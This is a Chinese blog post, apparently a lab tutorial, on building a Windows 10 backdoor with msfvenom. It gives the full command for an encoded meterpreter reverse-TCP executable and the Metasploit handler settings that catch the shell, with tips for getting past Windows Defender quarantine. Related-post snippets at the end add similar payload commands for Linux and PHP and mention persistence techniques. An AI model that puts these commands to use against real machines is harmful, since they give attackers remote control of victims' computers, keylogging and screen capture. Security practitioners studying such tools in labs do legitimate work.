msfvenom后门生成与利用

最新推荐文章于 2024-06-06 11:32:39 发布
最新推荐文章于 2024-06-06 11:32:39 发布
阅读量942 收藏 4
点赞数 2
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s0mor/article/details/103351108
版权
利用msfvenom生成木马后门拿到Windows 10靶机权限

需要关掉Windows defender

生成后门

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=10.101.0.139 lport=1234 -f exe > backdoor.exe

在这里插入图片描述

配置并监听

启动metasploit

msfconsole

选择监听模块

use exploit/multi/handler

配置参数

set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
分别设置LHOST为10.101.0.139和LPORT为1234

和刚刚的后门文件配置一样

运行

exploit

此时会监听本机的1234端口
在这里插入图片描述
在靶机上运行backdoor.exe

反弹shell成功

在这里插入图片描述

PS:
1、反弹shell乱码:设置终端编码为GBK2312解决

2、经常获取shell成功但是session马上关闭
在这里插入图片描述
是因为Windows defender虽然关闭,但还是会隔离掉后门文件,导致后门进程死掉
在这里插入图片描述

所以还是需要手动白名单

总结:
使用条件很苛刻,需要完全关闭windows defender,而且拿到的shell权限较低,需要进行提权,但是记录键盘、屏幕截图等可以使用

s0mor
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Msfvenonm生成后门木马
谢公子的博客
11-08 9618
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Msfvenom –p (- -payload-opti...
Msfvenom生成后门及运用
快吃小蛋糕吧的博客
10-01 4840
title: Msfvenom生成后门及运用 date: 2020-10-01 15:34:16 tags: [Metasploit,Backdoor] categories: 网络安全 Msfvenom生成后门及运用 本篇文章将会使用msfvenom来创建木马,然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。 后门生成: 首先通过各种操作系统,脚本语言来生成后门: 常用参数说明: e 编码方式 i 编码次数 b 在生成的程序中避免出.
Metasploit之多种后门生成
weixin_30790841的博客
08-30 425
本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe 参考“09-Metasploit之我的远程控制软件” li...
使用msfveonm后门生成模块和msfconsole获取主机权限 (Linux)
最新发布
X1DD1Asad343的博客
06-06 214
配置相应参数(可以使用show options 命令查看参数情况)设置监听端口(在不设置监听端口的情况下,默认监听端口为9999)后门在目标设备上运行后,监听设备即可看到目标设备上线。获取shell,同时查看当前用户权限信息。设置监听主机(一般就是kali的IP)接下来可以尝试输入一些命令。启动msfconsole。
msfvenom生成linux后门
denghan9435的博客
03-12 754
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf 转载于:https://www.cnblogs.com/kinome/p/8549489.html
利用msfvenom生成后门木马
qq_28147861的博客
01-18 2726
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。 用msfvenom生成一个PHP语言的PNG图片木马 代码:msfvenom -p php/meterpreter/reverse_tcp lh
超级Shift后门生成
11-27
尽管超级Shift后门生成器可能在某些非法场景下具有吸引力,但作为负责任的IT专业人士,我们应该坚决抵制这种行为,保护网络环境的安全与纯净。同时,学习和掌握网络安全知识,有助于我们更好地防御和应对潜在的威胁...
shift后门生成
12-07
shift后门生成器 这个东西我个人觉得是很好用的.. 网上有写shift后门密码直接就能破解. 这个还行..
Shift后门生成器.rar
07-15
后门生成器的工作原理通常是利用特定的技术来隐藏后门程序的入口点,使其难以被常规的反病毒软件检测到。这些后门可能嵌入到其他合法程序中,或者伪装成系统服务,以实现长期驻留并保持对系统的隐秘访问。 在使用...
超级shift后门生成
08-31
【描述】中的重复提及“shift后门生成器”,表明该工具可能是专注于利用某个名为“shift”的漏洞或功能来创建后门。在计算机编程中,"shift"通常指的是位移操作,这可能与这个后门的实现方式有关,例如通过特定的...
phpstudy后门rce批量利用脚本的实现
10-15
本文主要探讨了如何实现针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。PHPStudy是一款集成多种版本的PHP环境管理工具,但有时可能存在安全漏洞,允许攻击者通过特定的HTTP请求执行任意系统命令,这就是所谓的...
msfvenom官方帮助及常用后门
a1_pha的博客
02-19 357
【代码】msfvenom官方帮助及常用后门
android添加后门的一种方法
a22796853的博客
11-13 3143
在/frameworks//base/policy/src/com/android/internal/policy/impl/PhoneWindowManager.java文件中添加你需要处理的系统键值, 这是因为Android的系统键值在抛向应用层之间都是在该类中的interceptKeyBeforeQueueing被处理的。代码实现如下: //变量声明并初始化 private int
使用msfvenom生成后门软件并对靶机进行远程控制
qq_39120795的博客
12-06 4061
如何使用msfvenom生成后门软件并对靶机进行远程控制
实用教程:手动安卓应用中注入msf后门
weixin_34221036的博客
09-14 2594
本文讲的是实用教程:手动安卓应用中注入msf后门,在移动安全评估中,我们尝试将一些常用的应用程序加载上后门,并且加上后门之后应用程序毫无异常。这就可以用来证明如果使用的应用程序被种上后门,使用者会毫无知觉。 步骤一:生成攻击载荷 metasploit中的msfvenom可以生成多种类型的攻击载荷,当然我们也可以使用它来生成一个包含msf后门的apk。...
利用CLR劫持dll建立持续性后门
SheXinK’s Blog
11-23 936
利用CLR劫持dll建立持续性后门1、 测试环境2、 持续性后门建立 2、1 配置环境变量 2、2 生成 dll payload 2、3 在注册表中添加相应的键值   CLR全称Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。 1、 测试环境   攻击机:192.168.11.131   靶机:192.168.11.132(Win7) 2、 ...
【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务
今天是几号的博客
04-16 1309
alias命令的功能:为命令设置别名定义:alias ls = ‘ls -al’删除:unalias ls每次输入ls命令的时候都能实现ls -alalerts'这样目标执行ls命令后可以上线,不过ls命令会被阻塞在那里,很容易引起怀疑,当结束终端窗口时,反弹shell的会话也会随着被终结,而且更改后的alias命令只在当前窗口才有效(重启也会失效)2、升级:))";alerts’进行base64编码是因为python程序有空行和空格,将一段命令转换成单行命令。
MSF生成后门木马
一醉一休的博客
11-19 2358
为了方便平时使用,记录一下操作命令
Metasploit 生成各种后门
CSDN
01-13 9189
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
msfvenom生成安卓后门
09-10
生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值